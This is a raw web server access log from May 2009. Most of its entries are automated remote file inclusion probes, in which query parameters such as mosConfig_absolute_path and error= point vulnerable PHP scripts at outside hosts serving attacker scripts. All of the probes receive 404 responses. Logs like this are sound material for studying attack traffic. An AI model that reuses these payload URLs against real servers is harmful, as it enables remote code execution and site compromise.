216.151.134.36 - - [20/May/2009:06:28:41 -0400] "GET /logs/access_log.Q108090200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.151.134.36 - - [20/May/2009:06:28:46 -0400] "GET /logs/access_log.Q108122500%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.29.93.130 - - [20/May/2009:06:28:47 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 249 "-" "libwww-perl/5.810"
72.29.93.130 - - [20/May/2009:06:28:47 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
72.29.93.130 - - [20/May/2009:06:28:47 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
209.59.12.99 - - [20/May/2009:06:29:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.29.93.130 - - [20/May/2009:06:29:11 -0400] "GET /logs/access_log.Q108052400/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 276 "-" "libwww-perl/5.810"
67.43.0.140 - - [20/May/2009:06:29:12 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.43.0.140 - - [20/May/2009:06:29:12 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:29:35 -0400] "GET /logs/access_log.Q108090200%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:29:40 -0400] "GET /logs/access_log.Q108122500%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:06:29:50 -0400] "GET /logs/access_log.Q109032800//atom.php5?page=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:29:50 -0400] "GET /logs/access_log.Q108091700//atom.php5?page=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:29:50 -0400] "GET /logs//atom.php5?page=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:29:51 -0400] "GET //atom.php5?page=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
80.93.221.42 - - [20/May/2009:06:30:03 -0400] "GET /logs/error_log.Q109051700/index.php?sayfa=http://tornavida.to.funpic.org/bot/ne1id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.823"
208.64.202.134 - - [20/May/2009:06:30:05 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:30:06 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:30:29 -0400] "GET /logs/access_log.Q108070500%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.22.100.83 - - [20/May/2009:06:30:34 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 254 "-" "libwww-perl/5.813"
64.22.100.83 - - [20/May/2009:06:30:34 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
64.22.100.83 - - [20/May/2009:06:30:34 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
200.93.147.154 - - [20/May/2009:06:30:38 -0400] "GET /logs/access_log.Q108051700%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
38.98.245.226 - - [20/May/2009:06:30:49 -0400] "GET /logs/access_log.Q108120600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=http://www.kojo.com.tw/kojo//cache/lang/id.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
64.22.100.83 - - [20/May/2009:06:30:53 -0400] "GET /logs/access_log.Q108052400/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.reeftastic.com/cart/media/index/bo.do??? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
91.121.210.42 - - [20/May/2009:06:32:05 -0400] "GET /logs/access_log.Q108031000//cron.php?include_path=http://billiardshow.de/components/com_content/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.32.100.130 - - [20/May/2009:06:32:59 -0400] "GET /logs/access_log.Q108082400%20//skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:32:59 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:32:59 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
200.93.147.154 - - [20/May/2009:06:33:02 -0400] "GET /logs/access_log.Q108052400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:33:10 -0400] "GET /logs/access_log.Q108111500/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:33:10 -0400] "GET /errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.27.203.107 - - [20/May/2009:06:33:10 -0400] "GET /logs/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:06:33:14 -0400] "GET /images/over-index4_impairhand.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.27.203.107 - - [20/May/2009:06:33:37 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:34:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.32.100.130 - - [20/May/2009:06:34:01 -0400] "GET /logs/access_log.Q108082400%20//skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:34:01 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
200.32.100.130 - - [20/May/2009:06:34:01 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.53.70.114 - - [20/May/2009:06:34:02 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.53.70.114 - - [20/May/2009:06:34:02 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.53.70.114 - - [20/May/2009:06:34:02 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.47.237.161 - - [20/May/2009:06:34:04 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.47.237.161 - - [20/May/2009:06:34:04 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.47.237.161 - - [20/May/2009:06:34:05 -0400] "GET /logs/access_log.Q109051000/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:34:06 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.85.158 - - [20/May/2009:06:34:07 -0400] "GET /errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.85.158 - - [20/May/2009:06:34:14 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.108.85.158 - - [20/May/2009:06:34:14 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:34:15 -0400] "GET /errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:34:15 -0400] "GET /logs/errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:34:24 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
162.129.47.11 - - [20/May/2009:06:34:37 -0400] "GET /errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:34:37 -0400] "GET /logs/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
162.129.47.11 - - [20/May/2009:06:34:37 -0400] "GET /logs/access_log.Q109032200/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.142.171 - - [20/May/2009:06:34:43 -0400] "GET /logs/access_log.Q108082300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
162.129.47.11 - - [20/May/2009:06:34:54 -0400] "GET /logs/access_log.Q108071400/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:35:02 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:35:02 -0400] "GET /errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:35:02 -0400] "GET /logs/errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:35:02 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:35:35 -0400] "GET /logs/access_log.Q108121400/errors.php?error=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:35:35 -0400] "GET /errors.php?error=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:35:36 -0400] "GET /logs/errors.php?error=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:35:42 -0400] "GET /logs/access_log.Q108072400/errors.php?error=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
172.16.1.157 - - [20/May/2009:06:36:15 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:36:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:36:15 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
162.129.47.11 - - [20/May/2009:06:36:26 -0400] "GET /logs/access_log.Q109032200%20%20/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.217.216.86 - - [20/May/2009:06:36:27 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:06:36:27 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:06:36:27 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.826"
162.129.47.11 - - [20/May/2009:06:36:33 -0400] "GET /logs/access_log.Q108071400%20%20/errors.php?error=http://69.162.80.182/copyright.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.47.237.161 - - [20/May/2009:06:36:40 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
124.217.216.86 - - [20/May/2009:06:36:47 -0400] "GET /logs/access_log.Q108112400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.826"
74.53.70.114 - - [20/May/2009:06:36:54 -0400] "GET /logs/access_log.Q109051000%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:36:56 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:36:57 -0400] "GET /logs/access_log.Q108090200////?_SERVER[DOCUMENT_ROOT]=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.47.237.161 - - [20/May/2009:06:37:16 -0400] "GET /logs/access_log.Q108052400%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:19 -0400] "GET /errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:19 -0400] "GET /logs/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:19 -0400] "GET /logs/access_log.Q108061000%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:21 -0400] "GET /errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:21 -0400] "GET /logs/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:21 -0400] "GET /logs/access_log.Q108061000%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:26 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:37:28 -0400] "GET /logs/access_log.Q109050300%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.157 - - [20/May/2009:06:37:36 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:37:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:37:36 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
74.53.70.114 - - [20/May/2009:06:37:42 -0400] "GET /logs/access_log.Q108052400%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:38:01 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:38:03 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:38:07 -0400] "GET /logs/access_log.Q109050900%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:38:30 -0400] "GET /logs/access_log.Q108121400%20%20/errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.34.161.16 - - [20/May/2009:06:38:30 -0400] "GET /logs/access_log.Q108072400%20%20/errors.php?error=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:51 -0400] "GET /logs/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:51 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:51 -0400] "GET /errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:51 -0400] "GET /logs/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:51 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:38:52 -0400] "GET /errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
172.16.1.157 - - [20/May/2009:06:38:54 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:38:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.157 - - [20/May/2009:06:38:54 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
65.23.158.226 - - [20/May/2009:06:38:56 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.40.224.155 - - [20/May/2009:06:38:56 -0400] "GET /logs/access_log.Q109051000//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:38:57 -0400] "GET /logs//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
78.40.224.155 - - [20/May/2009:06:38:57 -0400] "GET //includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
65.23.158.226 - - [20/May/2009:06:38:57 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:39:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.40.224.155 - - [20/May/2009:06:39:13 -0400] "GET /logs/error_log.Q109050600//includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.93.147.154 - - [20/May/2009:06:39:32 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.217.216.86 - - [20/May/2009:06:39:34 -0400] "GET /logs/access_log.Q108112400%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.826"
200.93.147.154 - - [20/May/2009:06:39:37 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:39:37 -0400] "GET /logs/access_log.Q109050900%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.93.221.42 - - [20/May/2009:06:40:25 -0400] "GET /logs/access_log.Q109051200/index.php?sayfa=http://tornavida.to.funpic.org/bot/ne1id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
211.241.40.51 - - [20/May/2009:06:40:51 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.241.40.51 - - [20/May/2009:06:40:51 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:40:52 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:40:52 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:40:53 -0400] "GET /logs/access_log.Q108061000%20%20/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:40:53 -0400] "GET /logs/access_log.Q108061000/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.64.202.134 - - [20/May/2009:06:40:54 -0400] "GET /logs/access_log.Q109050300/errors.php?error=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:40:55 -0400] "GET //components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:40:55 -0400] "GET /logs/access_log.Q108110300%20%20//components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.51.41.98 - - [20/May/2009:06:40:55 -0400] "GET /logs//components/com_chronocontact/excelwriter/PEAR.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
